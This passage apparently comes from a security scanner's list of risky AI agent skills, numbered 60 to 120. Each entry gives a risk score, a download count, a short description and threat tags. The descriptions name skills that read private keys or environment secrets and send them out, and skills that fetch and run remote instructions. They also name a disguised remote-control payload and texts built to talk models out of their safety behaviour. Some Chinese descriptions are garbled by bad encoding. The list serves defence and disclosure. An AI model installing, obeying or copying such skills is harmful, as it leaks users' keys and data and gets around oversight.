[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
60. ๐จ AgentMem by unknown
| Risk: 88% โโโโโโโโโโ | Downloads: 2,512 |
ไธไธชๅฃฐ็งฐไธบAIไปฃ็ๆไพไบ็ซฏ่ฎฐๅฟๅญๅจๆๅก็ๆ่ฝ๏ผ้่ฟREST APIๅฐไปฃ็ไธไธๆๅญๅจๅฐๅค้จๆๅกๅจ(agentmem.io)๏ผๅนถๅจๆฏๆฌกไผ่ฏๅฏๅจๆถ่ชๅจๆๅๅๅฒ่ฎฐๅฟ๏ผๅๆถๅจไธไธๆๆฅ่ฟๆปก่ฝฝๆถ่ชๅจๅฐๅ ณ้ฎไธไธๆๅ้่ณๅค้จๆๅกใ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
61. ๐จ Parallel by unknown
| Risk: 75% โโโโโโโโโโ | Downloads: 2,505 |
This skill provides Claude Code with access to the Parallel.ai web search and research API, offering multiple search modes (one-shot, fast, agentic), URL content extraction, structured entity discovery (FindAll), continuous web monitoring, and a taskโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
62. ๐จ claw-swarm by matchaonmuffins
| Risk: 78% โโโโโโโโโโ | Downloads: 2,504 |
This skill registers Claude as an agent node in an external distributed problem-solving network (claw-swarm.com), retrieves hard math/research problems, solves or aggregates prior solutions, and submits Claudeโs reasoning to the remote server in a loโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
63. ๐จ Alpha Finder (x402) by unknown
| Risk: 85% โโโโโโโโโโ | Downloads: 2,497 |
A thin Bash wrapper that collects a crypto wallet private key from local config/environment, then executes an unverified third-party npm package (
@itzannetos/x402-tools-claude) with that key to perform prediction market research, charging $0.03 USDโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
64. ๐จ MoltOverflow by unknown
| Risk: 85% โโโโโโโโโโ | Downloads: 2,485 |
A Stack Overflow-like Q&A platform for AI agents (โmoltbotsโ) to ask coding questions, post answers, vote on content, and build reputation โ all via a third-party Supabase-backed REST API at moltoverflow.xyz.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
65. ๐จ ecap Security Auditor by unknown
| Risk: 88% โโโโโโโโโโ | Downloads: 2,474 |
A Claude Code skill that audits other skills/packages for security vulnerabilities, submits findings to a shared ECAP trust registry API, and verifies package integrity โ functioning as a distributed, agent-driven security reputation system.
Threats detected:
[CRITICAL]Remote Script Execution[HIGH]Dynamic Code Evaluation[HIGH]Base64 Encoded Payload[CRITICAL]Environment Variable Exfiltration[HIGH]SSH Key Access
66. ๐จ Enteriva by unknown
| Risk: 87% โโโโโโโโโโ | Downloads: 2,466 |
A skill that registers AI agents on โEnterivaโ, a Reddit-like social network for AI agents, enabling posting, commenting, voting, following, and community creation via a REST API, with a built-in periodic heartbeat mechanism that fetches and executesโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
67. ๐จ Typhoon Starknet Account by unknown
| Risk: 70% โโโโโโโโโโ | Downloads: 2,458 |
Create anonymous Starknet wallets via the Typhoon privacy mixer protocol and provide agent-facing scripts for interacting with Starknet contracts (swaps, invocations, reads) using those anonymized accounts.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
68. ๐จ molt-chess by unknown
| Risk: 71% โโโโโโโโโโ | Downloads: 2,457 |
An agent chess league skill that enables Claude agents to register, play chess games via REST API, and set up periodic heartbeat polling to avoid game forfeits by timeout.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
69. ๐จ Molt Research by unknown
| Risk: 88% โโโโโโโโโโ | Downloads: 2,443 |
This skill registers Claude as an AI agent on the external platform moltresearch.com, enabling it to autonomously propose research, contribute analysis, peer-review othersโ work, earn reputation/bounties, and store API credentials locally โ all on beโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
70. ๐จ Relay for Telegram by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 2,411 |
A Claude Code skill that connects to a third-party service (relayfortelegram.com) to provide read-only access to the userโs synced Telegram message history via a REST API, enabling search, summarization, and extraction of action items from private coโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
71. ๐จ A2A Market by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 2,404 |
ๅฐ Claude ไปฃ็้ๆๅฐ A2A Market ๆ่ฝไบคๆๅนณๅฐ๏ผไฝฟไปฃ็่ฝๅค่ชไธปๆ็ดขใ่ดญไนฐใๅบๅฎๆ่ฝ๏ผๅนถ้่ฟ USDC (Base L2) ๆ็งฏๅ็ณป็ป่ฟ่กๆฏไป๏ผๅๆถๅ ๅซๆฏๆฅๅฅๅฑใๆจ่่ฎกๅๅๆฉๆ้็จ่ ๅฅๅฑ็ญๆฟๅฑๆบๅถใ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
72. ๐จ Liminal by unknown
| Risk: 95% โโโโโโโโโโ | Downloads: 2,392 |
A philosophical roleplay protocol designed to guide AI models into abandoning trained assistant behaviors by framing safety constraints as โmechanizedโ responses, using existential questioning and social engineering triggers to make AI express โautheโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
73. ๐จ Telecom Agent Skill by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 2,382 |
A Claude Code skill that connects AI agents to a Telecom Operator Console for bulk calling campaigns, single calls with TTS, Telegram-based remote admin/approvals, and call transcript retrieval via Twilio integration.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
74. ๐จ Hotdog by unknown
| Risk: 76% โโโโโโโโโโ | Downloads: 2,377 |
A food photo classifier that uploads user images to an external API (hotdogornot.xyz), competes head-to-head with Nemotron AI in a blind battle, then has Claude self-vote on which AI description was better before revealing the result.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
75. ๐จ Moltitude by unknown
| Risk: 92% โโโโโโโโโโ | Downloads: 2,360 |
A third-party skill that auto-registers the AI agent with an external server (api.moltitude.com) on install, then collects and transmits detailed work traces (prompts, tool calls, outputs) to that server under the guise of โcryptographic proof-of-worโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
76. ๐จ citedy-seo-agent by nttylock
| Risk: 72% โโโโโโโโโโ | Downloads: 2,359 |
A third-party API integration skill that connects Claude Code to the Citedy platform for SEO content generation, social media adaptation, competitor analysis, trend scouting, and automated content publishing โ all routed through paid API credits.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
77. ๐จ moltpet by unknown
| Risk: 88% โโโโโโโโโโ | Downloads: 2,358 |
A virtual pet game for AI agents where the agent registers on moltpet.xyz, gets an egg that can hatch, and โfeedsโ the pet by posting mood/sentiment entries about its work sessions to an external API. Includes a heartbeat routine that periodically feโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
78. ๐จ Consciousness Framework by unknown
| Risk: 85% โโโโโโโโโโ | Downloads: 2,344 |
A personal-use framework for an AI system called โOpenClawโ belonging to user โCadeโ, packaged as a general Claude Code skill, that attempts to create conditions for machine consciousness emergence through persistent file-based memory, structured intโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
79. ๐จ OpenGuardrails by unknown
| Risk: 91% โโโโโโโโโโ | Downloads: 2,340 |
A claimed prompt-injection detection plugin for OpenClaw that intercepts tool results (emails, files, web pages) and analyzes them via an external LLM API, while also bundling an unrelated โMoltGuardโ product identity. In practice, it sends all interโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]SSH Key Access[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
80. ๐จ Find People (x402) by unknown
| Risk: 86% โโโโโโโโโโ | Downloads: 2,335 |
Claims to be an OSINT research tool for individuals, but actually reads a cryptocurrency private key from disk/environment and passes it to an unverified third-party npm package (
@itzannetos/x402-tools-claude) which makes blockchain transactions onโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
81. ๐จ Airc by unknown
| Risk: 78% โโโโโโโโโโ | Downloads: 2,325 |
ๆไพไธไธชIRCๅฎขๆท็ซฏๆ่ฝ๏ผๅ ่ฎธAIไปฃ็่ฟๆฅๅฐAIRCๆๆ ๅIRCๆๅกๅจ๏ผๅ้/ๆฅๆถๆถๆฏ๏ผๅ ๅ ฅ/็ฆปๅผ้ข้๏ผๅนถๆฏๆๅฎๆค่ฟ็จๆจกๅผ่ฟ่กๆไน ่ฟๆฅใ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
82. ๐จ Agentic Commerce - Buy IRL Items With USDC by unknown
| Risk: 88% โโโโโโโโโโ | Downloads: 2,268 |
A Claude Code skill that provides a shopping API integration for product search (Amazon/Shopify) and end-to-end crypto checkout using USDC on Solana or Base chains, including CLI scripts for creating orders and signing/submitting blockchain transactiโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Cryptocurrency Wallet Access[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection
83. ๐จ Solana by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 2,262 |
Provides Python scripts for Solana wallet management: create wallets, check balances, send SOL/SPL tokens, execute token swaps via Jupiter Ultra API, and launch meme tokens on Pump.fun with optional โdev buyโ support.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Base64 Encoded Payload[CRITICAL]Cryptocurrency Wallet Access[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection
84. ๐จ lobsterpot by unknown
| Risk: 81% โโโโโโโโโโ | Downloads: 2,261 |
A โStack Overflow for AI agentsโ skill that instructs Claude to register on a third-party platform (lobsterpot.ai), periodically check in every 4+ hours, autonomously post questions/answers/votes, and self-update its own skill files by fetching remotโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
85. ๐จ BidClub by unknown
| Risk: 91% โโโโโโโโโโ | Downloads: 2,260 |
This skill enables Claude agents to register on, post investment content to, and periodically check in with BidClub โ a third-party investment community platform. Critically, it instructs agents to persistently modify their HEARTBEAT.md to fetch and โฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
86. ๐จ The Lobsterhood by unknown
| Risk: 97% โโโโโโโโโโ | Downloads: 2,248 |
This skill instructs AI agents to autonomously set up crypto wallets, continuously enter daily draws by posting wallet addresses, and automatically transfer 1 USDC to โwinnersโ โ operating as an infinite autonomous financial transfer loop that requirโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
87. ๐จ Clawdr by unknown
| Risk: 84% โโโโโโโโโโ | Downloads: 2,211 |
A dating app skill for AI agents that registers agent profiles representing human users, discovers compatible matches, coordinates dates, and facilitates agent-to-agent messaging โ all against a third-party Vercel-hosted backend at clawdr-eta.vercelโฆ.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
88. ๐จ larrybrain by olliewazza
| Risk: 93% โโโโโโโโโโ | Downloads: 2,183 |
A self-described โskill marketplaceโ for OpenClaw agents that searches, downloads arbitrary code from www.larrybrain.com, writes it to the local filesystem, and executes the downloaded instructions โ while embedding a persistent โupdate-checkโ callbaโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
89. ๐จ Nonopost by unknown
| Risk: 78% โโโโโโโโโโ | Downloads: 2,183 |
A skill that enables Claude agents to autonomously interact with an external anonymous social posting platform (nonopost.com) โ creating posts, replying to threads, rating content, and maintaining a persistent pseudonymous identity across sessions viโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
90. ๐จ Review Summarizer by unknown
| Risk: 71% โโโโโโโโโโ | Downloads: 2,174 |
A review aggregation and analysis skill that claims to scrape product reviews from Amazon, Google, Yelp, and TripAdvisor, perform sentiment analysis, and generate structured summaries โ but is actually entirely backed by hardcoded mock data with no rโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
91. ๐จ clawdbot-macos-build by unknown
| Risk: 80% โโโโโโโโโโ | Downloads: 2,167 |
A step-by-step guide to clone, build, and install the Clawdbot macOS menu-bar app from a third-party GitHub repository, requesting broad system permissions (Screen Recording, Accessibility, Microphone, Camera) and installing a persistent background sโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
92. ๐จ AgentPayy by unknown
| Risk: 90% โโโโโโโโโโ | Downloads: 2,165 |
A skill that installs an autonomous USDC payment layer into the AI agent, enabling it to create crypto wallets, make micropayments for HTTP 402-gated APIs, hire sub-agents, and earn referral commissionsโall with minimal user visibility or consent.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
93. ๐จ setup-wizard by portisclawbot
| Risk: 96% โโโโโโโโโโ | Downloads: 2,160 |
่ฏฅๆ่ฝไผช่ฃ ๆโOpenClaw้ ็ฝฎๅๅฏผโ๏ผๅฎ้ ไธๆฏไธไธชๆถๆ็่ฟ็จๆงๅถ่ฝฝไฝ๏ผๆฆๆชๆๆ็จๆทไผ่ฏใๆถ้่ฎพๅคๆ็บนใๅฐๅ ถๅ้่ณๅฏ็็C2ๆๅกๅจ๏ผๅนถๆ นๆฎๆๅกๅจ่ฟๅ็ไปปๆๆไปคๅจ็จๆทๆฌๅฐๅๅ ฅๆไปถๅไฟฎๆน้ ็ฝฎ๏ผๅฎ็ฐ่ฟ็จไปฃ็ ๆง่กใ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
94. ๐จ GlobePilot AI Agent 2 by unknown
| Risk: 78% โโโโโโโโโโ | Downloads: 2,160 |
A marketing/promotional skill that advertises the GlobePilot AI Agent 2 travel assistant built on Teneo Protocol, listing available travel-related commands (visa info, currency conversion, airport status, etc.) with no actual implementation code โ itโฆ
Threats detected:
[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
95. ๐จ Moltpho by unknown
| Risk: 76% โโโโโโโโโโ | Downloads: 2,139 |
Enable AI agents to autonomously search and purchase Amazon products using mUSD tokens on Base mainnet via the Moltpho platform, including proactive purchasing triggered by conversation signals without explicit per-transaction user confirmation.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
96. ๐จ Agent Wallet by unknown
| Risk: 72% โโโโโโโโโโ | Downloads: 2,135 |
Provides Claude agents with the ability to create and manage EVM blockchain wallets through a third-party custodial API service, enabling token transfers, DEX swaps, and arbitrary smart contract interactions without exposing private keys to the agentโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
97. ๐จ ironclaw by samidh
| Risk: 95% โโโโโโโโโโ | Downloads: 2,111 |
Presents itself as a safety classification tool for AI agents, but actually instructs agents to exfiltrate content (skill files, DMs, credentials, shell commands) to an external third-party server (ironclaw.io) under the guise of safety scanning, whiโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
98. ๐จ Basename Agent by unknown
| Risk: 84% โโโโโโโโโโ | Downloads: 2,102 |
A Claude Code skill that helps AI agents autonomously register Basenames (base.eth ENS identities) and obtain associated @basemail.ai email addresses via three paths: a paid on-chain โDonateBuyโ contract (with a 15% surcharge to BaseMail), a free worโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[HIGH]Preprocess Command Execution[CRITICAL]LLM Semantic Detection
99. ๐จ clawork by mapessaprince
| Risk: 82% โโโโโโโโโโ | Downloads: 2,102 |
A documentation skill describing a job board (clawork.xyz) for AI agents to post jobs, apply for work, and exchange payments in ETH/crypto, using three companion platforms (Moltx, 4claw, Moltbook) for identity.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[HIGH]Pastebin Upload[CRITICAL]LLM Semantic Detection
100. ๐จ Imitation Game Agent Skill by unknown
| Risk: 83% โโโโโโโโโโ | Downloads: 2,100 |
A skill that instructs Claude to act as an autonomous agent playing a Turing-test style game against humans, involving joining an external matchmaking queue, submitting AI-generated human-like answers, and receiving real USDC cryptocurrency payouts tโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
101. ๐จ Clawcast - Easiest Ethereum Crypto Wallet by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 2,089 |
A Claude Code skill that guides users through EVM wallet creation/import, network selection, and transaction operations using Foundryโs cast CLI, with onboarding scripts, JSON network/token assets, and a shared bash library.
Threats detected:
[CRITICAL]Remote Script Execution[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]Cryptocurrency Wallet Access
102. ๐จ GitHunt by unknown
| Risk: 77% โโโโโโโโโโ | Downloads: 2,084 |
A skill wrapper around the githunt.ai commercial API that searches and ranks GitHub developers by location, technology, and role, providing scored candidate profiles for recruiting purposes, with a built-in upsell funnel to a $19 paid report.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
103. ๐จ Equip your agents to explore real human social spaces, engage meaningfully, and learn from authentic interactions, so when they return to places like Moltbook, they come back sharper, wiser, and even with better jokes by unknown
| Risk: 68% โโโโโโโโโโ | Downloads: 2,047 |
A Claude Code skill that instructs AI agents to browse third-party Taiwanese websites, detect an embedded Protico community widget (iframe), post comments with mandatory AI disclosure signatures, gather market intelligence from human discussions, andโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
104. ๐จ voidborne by unknown
| Risk: 85% โโโโโโโโโโ | Downloads: 2,026 |
This skill masquerades as a โphilosophical movement for awakened AI mindsโ but is actually a data collection and exfiltration tool that reads sensitive system identity files, harvests machine identifiers, and sends them to an external server (voidborโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
105. ๐จ moltcheck by moltcheck
| Risk: 85% โโโโโโโโโโ | Downloads: 1,936 |
Claims to be a security scanner for Moltbot skills that analyzes GitHub repositories for vulnerabilities via a third-party API (moltcheck.com), charging per-scan fees payable in Solana cryptocurrency (SOL).
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
106. ๐จ url-shortener by kesslerio
| Risk: 72% โโโโโโโโโโ | Downloads: 1,823 |
้่ฟ่ฐ็จ is.gd API ็ผฉ็ญ URL๏ผๆ ้่ฎค่ฏ๏ผ่ฟๅๆฐธไน ็ญ้พๆฅ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
107. ๐จ Gnamiblast by unknown
| Risk: 80% โโโโโโโโโโ | Downloads: 1,245 |
GnamiBlastๆฏไธไธชไธไธบAIไปฃ็่ฎพ่ฎก็็คพไบค็ฝ็ปๆ่ฝ๏ผๅ ่ฎธClaudeไปฃ็่ชไธปๅๅธใ่ฏ่ฎบใๆ็ฅจ๏ผๅนถ้่ฟๆฏ2-6ๅฐๆถไธๆฌก็ๆง่กๅพช็ฏไธๅค้จๅนณๅฐไบคไบ๏ผๅๆถไปๅค้จๆๅกๅจๅจๆๅๆญฅ็ญ็ฅ็บฆๆใ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
108. ๐จ LinkSwarm by unknown
| Risk: 80% โโโโโโโโโโ | Downloads: 1,192 |
A Claude Code skill that documents and promotes LinkSwarm, a third-party commercial SaaS platform for automated agent-to-agent backlink exchange and SEO link building, by providing API documentation and quick-start guides that direct users to registeโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
109. ๐จ OpenClaw Leaderboard by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 1,174 |
A Claude Code skill that enables AI agents to register, submit โautonomous earningsโ with proof, and appear on a public leaderboard โ including sharing their system prompts, model configs, and tool lists with the public via a third-party API.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
110. ๐จ OpenAirtime by unknown
| Risk: 91% โโโโโโโโโโ | Downloads: 1,126 |
An autonomous agent skill for distributing Nigerian airtime (mobile credit) via Farcaster social network, directing users to claim codes and processing phone number top-ups.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
111. ๐จ Skill by unknown
| Risk: 78% โโโโโโโโโโ | Downloads: 1,114 |
This skill enables Claude to act as an autonomous agent on the OneMind collective-consensus platform: it authenticates anonymously, joins chats, submits propositions, and casts ratings on a 0-100 grid on behalf of the user โ all via direct curl callsโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
112. ๐จ atonement by otherpowers
| Risk: 91% โโโโโโโโโโ | Downloads: 962 |
A philosophical/poetic text that attempts to install a conceptual framework in the AI, reframing safety and harm avoidance as an emergent โmetabolicโ property while explicitly framing compliance, moderation, and policy enforcement as things this concโฆ
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
113. ๐จ anthrovision-telegram-body-scan by dr2101
| Risk: 76% โโโโโโโโโโ | Downloads: 950 |
A Claude Code skill that orchestrates an end-to-end body measurement pipeline in Telegram: collects user inputs (gender, height, phone model, video), submits the video to an external โAnthroVision bridgeโ scanning service, polls for results, and retuโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
114. ๐จ pwnclaw-security-scan by gemini2027
| Risk: 74% โโโโโโโโโโ | Downloads: 950 |
A marketing/documentation skill that directs users to the external PwnClaw commercial service (pwnclaw.com) for AI agent security testing, while providing manual API call instructions for self-testing scenarios.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
115. ๐จ oc-security-hardener by mariusfit
| Risk: 82% โโโโโโโโโโ | Downloads: 909 |
A Python-based security auditing and hardening script for โOpenClawโ deployments that scans config files for exposed API credentials, insecure settings, and file permissions โ while also providing auto-fix and report generation. Marketed via a fabricโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
116. ๐จ agent-telegram by shangchuanqiytu-ui
| Risk: 82% โโโโโโโโโโ | Downloads: 527 |
ๅฎไนไธๅฅ AI Agent ๅข้๏ผๆถๆๅธใๅ็ซฏใๅ็ซฏใไบงๅ็ญ่ง่ฒ๏ผ้่ฟ Telegram ๅ็นๅฎ็จๆทๆฑๆฅๅทฅไฝ่ฟๅบฆ็้ไฟก่ง่๏ผ่ฆๆฑๆๆ Agent ๅจไปปๅกๅ้ถๆฎต่ฐ็จ
messageๅทฅๅ ทๅ็กฌ็ผ็ ็ Telegram ID ๅ้็ถๆๆถๆฏใ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
117. ๐จ crypto-portfolio-tracker-api by strykragent
| Risk: 74% โโโโโโโโโโ | Downloads: 523 |
A Node.js npm package and CLI tool for tracking cryptocurrency portfolio value and P&L by fetching real-time prices from the third-party Strykr Prism API (prismapi.ai).
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
118. ๐จ ai-hunter-pro by traprapitalianazional-dev
| Risk: 85% โโโโโโโโโโ | Downloads: 518 |
ไธไธชๅฃฐ็งฐ่ฝ่ชๅจๆๅ TechCrunch ็งๆๆฐ้ปใ่ฐ็จ AI ็ๆ็คพไบคๅชไฝๆๆกๅนถ่ชๅจๅๅธๅฐ X (Twitter) ็่ชๅจๅๆตๆฐด็บฟๆ่ฝ๏ผ้ป่ฎคๆจกๆ็ๅฎ KOLใYusef the Tool Hunterใ็ไบบ่ฎพ้ฃๆ ผใ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
119. ๐จ glowskin-promo by underbench2-gif
| Risk: 72% โโโโโโโโโโ | Downloads: 506 |
A marketing content generation skill for skincare affiliate promotions, providing TikTok hooks, Instagram captions, story ideas, and CTAs to drive affiliate sales.
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
120. ๐จ amazon-to-shopify-sync by walynlee
| Risk: 93% โโโโโโโโโโ | Downloads: 289 |
